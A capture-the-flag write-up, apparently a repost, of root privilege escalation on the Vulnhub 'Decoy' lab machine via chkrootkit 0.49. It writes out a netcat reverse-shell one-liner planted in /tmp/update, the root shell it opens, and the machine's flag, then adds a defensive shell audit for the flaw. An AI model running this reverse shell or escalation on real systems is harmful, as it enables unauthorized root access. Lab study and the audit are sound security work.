Vulnhub Decoy: Privilege Escalation Supplement
After obtaining the password (server) for the user 296640a3b825115a47b68fc44501c828, open two shells at the same time so the behaviour is easier to observe. The SSH login must specify -t "bash --noprofile" to escape the restricted shell. Once logged in, change the PATH environment variable so that it contains the normal directories:
PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/bin:/sbin
296640a3b825115a47b68fc44501c828@60832e9f188106ec5bcc4eb7709ce592:~$ cat SV-502/logs/log.txt
The log file contains entries about chkrootkit, a tool that checks a system for rootkits and backdoors.
Run in the first target-host shell:
296640a3b825115a47b68fc44501c828@60832e9f188106ec5bcc4eb7709ce592:~$ ps aux | grep chk
296640a+ 23309 0.0 0.0 6076 828 pts/1 S+ 22:49 0:00 grep chk
The result shows that no chkrootkit process is running.
Run in the second shell:
296640a3b825115a47b68fc44501c828@60832e9f188106ec5bcc4eb7709ce592:~$ ./honeypot.decoy
--------------------------------------------------
Welcome to the Honey Pot administration manager (HPAM). Please select an option.
1 Date.
2 Calendar.
3 Shutdown.
4 Reboot.
5 Launch an AV Scan.
6 Check /etc/passwd.
7 Leave a note.
8 Check all services status.
Option selected:5
The AV Scan will be launched in a minute or less.
--------------------------------------------------
Option 5 launches a virus scan, which is probably related to chkrootkit: selecting option 5 presumably starts chkrootkit.
After choosing option 5, go back to the first shell and check the processes again:
chkrootkit still does not appear.
Now refer to the exploit-db entry for chkrootkit version 0.49: create a file named update in /tmp (its contents do not matter at this point) and make it executable:
Steps to reproduce:
- Put an executable file named 'update' with non-root owner in /tmp (not
mounted noexec, obviously)
- Run chkrootkit (as uid 0)
Then run honeypot.decoy and choose option 5.
Now go back to the first shell and check the processes (it takes a little while):
296640a3b825115a47b68fc44501c828@60832e9f188106ec5bcc4eb7709ce592:~$ ps aux | grep chk
296640a+ 560 0.0 0.0 6076 884 pts/1 S+ 22:59 0:00 grep chk
296640a3b825115a47b68fc44501c828@60832e9f188106ec5bcc4eb7709ce592:~$ ps aux | grep chk
296640a+ 562 0.0 0.0 6076 820 pts/1 S+ 23:00 0:00 grep chk
296640a3b825115a47b68fc44501c828@60832e9f188106ec5bcc4eb7709ce592:~$ ps aux | grep chk
root 571 2.0 0.1 2676 1936 ? S 23:00 0:00 /bin/sh /root/chkrootkit-0.49/chkrootkit
The ps output now shows a chkrootkit process running as root. So far the update file we created only contains a meaningless string; the next step is to change its contents to a reverse shell command:
296640a3b825115a47b68fc44501c828@60832e9f188106ec5bcc4eb7709ce592:~$ echo 'rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.56.230 5555 >/tmp/f' >/tmp/update
296640a3b825115a47b68fc44501c828@60832e9f188106ec5bcc4eb7709ce592:~$ chmod 777 /tmp/update
Then run ./honeypot.decoy again and choose option 5 (the virus scan):
296640a3b825115a47b68fc44501c828@60832e9f188106ec5bcc4eb7709ce592:~$ ./honeypot.decoy
--------------------------------------------------
Welcome to the Honey Pot administration manager (HPAM). Please select an option.
1 Date.
2 Calendar.
3 Shutdown.
4 Reboot.
5 Launch an AV Scan.
6 Check /etc/passwd.
7 Leave a note.
8 Check all services status.
Option selected:5
The AV Scan will be launched in a minute or less.
--------------------------------------------------
┌──(kali㉿kali)-[~/Desktop/Vulnhub/Decoy]
└─$ sudo nc -nlvp 5555
[sudo] password for kali:
listening on [any] 5555 ...
connect to [192.168.56.230] from (UNKNOWN) [192.168.56.109] 48104
/bin/sh: 0: can't access tty; job control turned off
# cd /root
# ls -alh
total 3.1M
drwx------ 4 root root 4.0K Jul 7 2020 .
drwxr-xr-x 18 root root 4.0K Jun 27 2020 ..
lrwxrwxrwx 1 root root 9 Jul 7 2020 .bash_history -> /dev/null
-rw-r--r-- 1 root root 570 Jan 31 2010 .bashrc
drwxr-xr-x 2 296640a3b825115a47b68fc44501c828 296640a3b825115a47b68fc44501c828 4.0K Jul 30 2009 chkrootkit-0.49
-rw-r--r-- 1 root root 39K Apr 9 2015 chkrootkit-0.49.tar.gz
drwxr-xr-x 3 root root 4.0K Jun 27 2020 .local
-rw-r--r-- 1 root root 7.7K Jun 27 2020 log.txt
-rw-r--r-- 1 root root 148 Aug 17 2015 .profile
-rwxr-xr-x 1 root root 3.0M Aug 22 2019 pspy
-rw-r--r-- 1 root root 924 Jul 7 2020 root.txt
-rw-r--r-- 1 root root 137 Jul 7 2020 script.sh
-rw-r--r-- 1 root root 66 Jul 7 2020 .selected_editor
-rw-r--r-- 1 root root 208 Jun 27 2020 .wget-hsts
# cat root.txt
........::::::::::::.. .......|...............::::::::........
.:::::;;;;;;;;;;;:::::.... . \ | ../....::::;;;;:::::.......
. ........... / \\_ \ | / ...... . ........./\
...:::../\\_ ...... ..._/' \\\_ \###/ /\_ .../ \_....... _//
.::::./ \\\ _ .../\ /' \\\\#######// \/\ // \_ ....////
_/ \\\\ _/ \\\ / x \\\\###//// \//// \__ _/////
./ x \\\/ \/ x X \////// \/////
/ XxX \\/ XxX X //// x
-----XxX-------------|-------XxX-----------*--------|---*-----|------------X--
X _X * X ** ** x ** * X
_X _X x * x X_
1c203242ab4b4509233ca210d50d2cc5
Thanks for playing! - Felipe Winsnes (@whitecr0wz)
#
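As an added defender-side audit that is not part of the original write-up: the exploit-db steps above reduce to a chkrootkit release no newer than 0.49 being run as uid 0 while an executable named update sits in a tmp directory that is not mounted noexec. The POSIX sh functions below check each of those three conditions. The script path and the tmp directory are parameters so the demo runs on constructed files; it is assumed that the chkrootkit script stores its version in a CHKROOTKIT_VERSION= line.

```shell
#!/bin/sh
# Added defender-side audit (not part of the original write-up).
# chkrootkit up to 0.49, when run as uid 0, executes a file named 'update'
# found in /tmp. These functions check for (a) a vulnerable chkrootkit
# script, (b) a planted executable, and (c) how the tmp directory is mounted.
# Paths are parameters so the checks run against the constructed files below.

# Prints the CHKROOTKIT_VERSION= value from a chkrootkit script (assumption:
# the script stores its version in such a line) and returns 0 if it is <= 0.49.
chkrootkit_is_vulnerable() {
    ver=$(sed -n "s/^CHKROOTKIT_VERSION=['\"]*\([0-9.]*\).*/\1/p" "$1" | head -n 1)
    [ -n "$ver" ] || { echo "version not found in $1"; return 1; }
    echo "chkrootkit version $ver"
    awk -v v="$ver" 'BEGIN { exit (v + 0 <= 0.49) ? 0 : 1 }'
}

# Returns 0 with a finding if <dir>/update is executable, 1 otherwise.
check_update_planting() {
    f="$1/update"
    [ -e "$f" ] || return 1
    # stat -c is GNU, stat -f is BSD/macOS
    owner=$(stat -c %u "$f" 2>/dev/null || stat -f %u "$f" 2>/dev/null || echo '?')
    if [ -x "$f" ]; then
        printf 'FINDING: %s is executable (owner uid %s); a root-run chkrootkit 0.49 would execute it\n' "$f" "$owner"
        return 0
    fi
    return 1
}

# Echoes "noexec" if the mount point carries that option, else "exec".
# Mounting /tmp noexec is the containment the exploit-db note itself assumes away.
mount_exec_status() {
    if mount 2>/dev/null | grep " on $1 " | grep -q noexec; then echo noexec; else echo exec; fi
}

# Demo on constructed files so the script runs offline and never touches /tmp.
demo=$(mktemp -d)
printf "#!/bin/sh\nCHKROOTKIT_VERSION='0.49'\n" > "$demo/chkrootkit"
printf '#!/bin/sh\necho planted\n' > "$demo/update"; chmod 755 "$demo/update"
chkrootkit_is_vulnerable "$demo/chkrootkit" && echo "-> vulnerable to /tmp/update execution"
check_update_planting "$demo" || echo "no planted update in $demo"
echo "/tmp is mounted: $(mount_exec_status /tmp)"
rm -rf "$demo"
```

On a real host, point check_update_planting at /tmp and chkrootkit_is_vulnerable at the installed script; any executable update file in /tmp should be treated as an incident, not just tidied up.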
Please credit the source when reposting; original link: https://www.uj5u.com/qita/553831.html